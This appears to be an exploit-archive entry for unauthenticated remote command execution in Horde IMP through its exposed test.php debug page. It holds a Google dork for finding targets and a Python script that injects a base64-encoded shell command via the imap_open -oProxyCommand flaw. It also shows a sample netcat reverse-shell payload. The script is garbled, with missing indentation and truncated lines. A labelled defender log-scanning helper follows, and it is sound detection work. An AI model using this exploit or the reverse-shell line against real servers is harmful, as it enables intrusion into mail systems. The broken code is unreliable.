Horde Imp Unauthenticated Remote Command Execution

Horde Imp suffers from a remote command execution vulnerability.

MD5 | 338fa386602c665631b7d891401eb06f

# Exploit Title: Horde Imp Unauthenticated Remote Command Execution 
# Google Dork: inurl:/imp/login.php
# Date: 10/01/2019
# Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
# Vendor Homepage: https://www.horde.org/apps/imp/
# Software Link: https://www.horde.org/download/imp
# Version: All IMP versions
# Tested on: Debian/Ubuntu

import requests
import sys
import base64
import random
import string

| Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT |
| Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page |

Horde Imp, an application that comes with the Horde GroupWare/Webmail suite, exposes an unauthenticated debug page with a form
that permits IMAP requests to arbitrary hosts. The page is at http://horde_path/imp/test.php and should be deleted after installation.
Combining CVE-2018-19518 with the lack of input sanitization makes it possible to execute shell commands.
Tested on Debian/Ubuntu.

def check(target):
    # Fingerprint the exposed debug page: test-page title present and PHP 5.x reported
    try:
        res_check = requests.get(target)
        if 'PHP Mail Server Support Test' in res_check.text and 'PHP Major Version: 5.' in res_check.text:
            print("[+] Target is most likely vulnerable")
            return True
        print("[-] Target doesn't look vulnerable")

    except requests.exceptions.RequestException as e:
        print("[-] Connection Issue")

def exploit(target,cmd):

cmd= base64.b64encode(cmd)
payload1 = random.choice(string.ascii_letters)
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',

res = requests.post(target,headers=new_headers,data=[('server',payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'), #in order to avoid url encoding by requests
print('[+] Sent!')

if(len(sys.argv)) < 3:

print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
print('[+] Enclose shell commands between double quotes')
print('[+] example python horde_imap_cmd.py "mknod /tmp/bk p; nc 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')

target = sys.argv[1] #+ '/imp/test.php'
cmd = sys.argv[2]

if check(target):
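
Added example, not part of the original advisory or the authors' script: a log triage helper for defenders that finds requests to the debug page described above (imp/test.php) in web server access logs and flags the User-Agent hard-coded in the script on this page. It assumes the Apache/nginx combined log format; the function names are hypothetical and the sample lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# User-Agent string hard-coded in the script on this page.
POC_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; "
          "SV1; .NET CLR 1.1.4322)")

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(line):
    """Return a finding for a request to imp/test.php, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string and decode %xx so encoded paths still match.
    path = unquote(urlsplit(m["target"]).path).lower()
    if not path.endswith("/imp/test.php"):
        return None
    return {
        "ip": m["ip"],
        "time": m["ts"],
        # POST means the debug form was submitted, GET is only a page view.
        "kind": "form-submission" if m["method"] == "POST" else "probe",
        # 200 means the page is still deployed and answered the request.
        "served": m["status"] == "200",
        "poc_user_agent": m["ua"] == POC_UA,
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2019:09:14:01 +0000] "GET /horde/imp/test.php HTTP/1.1" 200 5120 "-" "curl/7.58.0"',
    '192.0.2.10 - - [10/Jan/2019:09:14:05 +0000] "POST /horde/imp/test.php HTTP/1.1" 200 6342 "-" "' + POC_UA + '"',
    '198.51.100.7 - - [10/Jan/2019:09:20:44 +0000] "GET /horde/imp/login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2019:09:31:12 +0000] "GET /horde/imp/%74est.php?x=1 HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any finding with `served` set to true means the debug page is still deployed; as stated above, test.php should be deleted after installation.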

